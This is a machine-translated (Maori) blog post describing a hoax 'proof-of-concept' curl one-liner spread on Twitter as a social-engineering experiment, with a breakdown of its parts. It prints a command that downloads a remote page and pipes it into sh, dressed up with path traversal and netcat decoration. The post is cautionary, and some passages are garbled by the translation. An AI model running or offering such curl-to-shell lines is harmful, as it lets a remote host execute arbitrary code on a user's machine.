Tuhipoka. whakamaori.:
TL; DR: Kaua e whakamahi i te pipelining konae i roto i te sh, i te bash ranei i raro i nga ahuatanga katoa. He huarahi pai tenei ki te ngaro te mana o to rorohiko.
E hiahia ana ahau ki te whakapuaki ki a koe i tetahi korero poto mo te mahi PoC pakiwaitara i hangaia i te 31 o Mei. I puta wawe ia ki te whakautu i nga korero mai i
Ka mutu taku mahi i tetahi tikanga whakapouri hou i roto i te curl, i kii ahau i te tweet taketake me te "patai i tetahi PoC mahi" kei roto i te rarangi waehere kotahi e kii ana e whakamahi ana i te whakaraeraetanga kua kitea. Ko te tikanga, he tino poauau tenei. I whakaaro ahau ka kitea tonutia ahau, me te pai ka whiwhi au i nga retweets (aue).
Heoi, kare e taea e au te whakaaro he aha te mea i muri mai. Kua piki te rongonui o taku tweet. He mea whakamiharo, i tenei wa (15:00 i te wa o Moscow i te Pipiri 1) he torutoru nga tangata kua mohio he korero teka tenei. He maha nga tangata ka whakahoki ano i a ia me te kore e tirotirohia (kaore i te whakamihi i nga whakairoiro ASCII ataahua e whakaputa ana).
Titiro noa te ataahua!
Ahakoa he rawe katoa enei koropiko me nga tae, e marama ana me whakahaere te tangata i te waehere ki runga i a raatau miihini kia kitea ai. Waimarie, he rite tonu te mahi a nga kaitirotiro, me te mea kare au i tino hiahia ki te uru atu ki te raruraru ture, ko te waehere i tanumia ki taku papaanga kei te hanga waea paoro me te kore e ngana ki te whakauru, ki te mahi i etahi atu waehere.
He rereke iti:
curl -gsS https://127.0.0.1-OR-VICTIM-SERVER:443/../../../%00/nginx-handler?/usr/lib/nginx/modules/ngx_stream_module.so:127.0.0.1:80:/bin/sh%00<'protocol:TCP' -O 0x0238f06a#PLToffset |sh; nc /dev/tcp/localhost
Ko te hangahanga Hapori-hiko (S.E.E.) he nui ake i te hītinihanga noa
Ko te haumaru me te waiatanga tetahi waahanga nui o tenei whakamatautau. Ki taku whakaaro ko ratou te take i angitu ai ia. Ko te rarangi whakahau e whakaatu ana i te haumarutanga ma te korero ki "127.0.0.1" (te localhost rongonui). Ka kiia ko Localhost he haumaru me nga raraunga kei runga e kore e waiho i to rorohiko.
Ko te mohiotanga te waahanga tuarua o te S.E.E. o te whakamatautau. I te mea ko te nuinga o te hunga whakarongo ko nga tangata e mohio ana ki nga kaupapa o te haumaru rorohiko, he mea nui ki te hanga waehere kia pai ai te ahua o etahi waahanga o taua mea (he haumaru hoki). Ko te tango i nga huānga o nga ariā whakamahi tawhito me te whakakotahi ki tetahi huarahi rereke kua kitea he tino angitu.
Kei raro iho nei te whakamaarama taipitopito o te raina kotahi. Ko nga mea katoa kei runga i tenei rarangi ka mau ahua whakapaipai, me te mea kaore he mea e hiahiatia ana mo tana mahi tuturu.
He aha nga waahanga e tino hiahiatia ana? Tenei -gsS
, -O 0x0238f06a
, |sh
me te tūmau tukutuku ake. Karekau he tohutohu kino i roto i te tūmau tukutuku, engari i tukuna noa nga whakairoiro ASCII ma te whakamahi i nga whakahau echo
i roto i te tuhinga kei roto index.html
. I te wa i uru te kaiwhakamahi ki tetahi raina me |sh
i waenganui, index.html
ka utaina, ka mahia. Waimarie, karekau he whakaaro kino a nga kaitiaki o te tūmau tukutuku.
-
../../../%00
— e tohu ana i te haere ki tua atu o te whaiaronga; -
ngx_stream_module.so
— ara ki te kōwae NGINX matapōkere; -
/bin/sh%00<'protocol:TCP'
- e kiia ana kei te whakarewahia e matou/bin/sh
i runga i te miihini whaainga ka tukuna ano te putanga ki te hongere TCP; -
-O 0x0238f06a#PLToffset
- whakauru ngaro, taapiri#PLToffset
, kia rite te ahua o te putunga mahara kei roto i te PLT; -
|sh;
- tetahi atu wahanga nui. I hiahia matou ki te huri i te putanga ki te sh/bash kia mahia ai te waehere ka puta mai i te tūmau tukutuku whakaeke kei te0x0238f06a
(2.56.240.x
); -
nc /dev/tcp/localhost
- he hangarua e korero ana a netcat/dev/tcp/localhost
kia ora ano nga mea katoa. Ko te mea pono, kaore he mahi me te whakauru ki te raina mo te ataahua.
Ka mutu tenei i te wetewete o te tuhi raina-kotahi me te matapaki mo nga ahuatanga o te "haapori-hikohiko" (hītinihanga uaua).
Whirihoranga Tūmau Tukutuku me nga Whakataunga
I te mea ko te nuinga o aku kaiohauru he infosec/hackers, i whakatau ahau kia kaha ake te aukati i te paetukutuku tukutuku ki nga korero o te "paanga" ki a raatau, kia whai mahi nga taangata (a he mea ngahau ki te whakaturia). E kore ahau e whakararangi i nga mahanga katoa i konei mai i te mea kei te haere tonu te whakamatautau, engari koinei etahi o nga mahi a te kaimau:
- Ka aro turuki i nga ngana tohatoha ki etahi whatunga hapori me te whakakapi i nga momo karakōnui arokite hei akiaki i te kaiwhakamahi ki te paato i te hono.
- Ka anga a Chrome/Mozilla/Safari/etc ki te ataata whakatairanga Thugcrowd kaua e whakaatu i te tuhinga anga.
- Maataki mo nga tohu OBVIOUS o te pokanoa/ko te mahi hacking, katahi ka timata te tuku tono ki nga tūmau NSA (ha!).
- Ka whakauruhia he Torotiana, me te kete BIOS, i runga i nga rorohiko katoa e toro atu ana nga kaiwhakamahi ki te kaihautu mai i te kaitirotiro auau (he kata noa!).
He wahi iti o te antimers
I tenei keehi, ko taku whainga anake ko te mohio ki etahi o nga ahuatanga o Apache - ina koa, nga ture pai mo te whakatika i nga tono - a ka whakaaro ahau: he aha?
NGINX Whakamahi (Tuturu!)
Ohauru ki
Source: will.com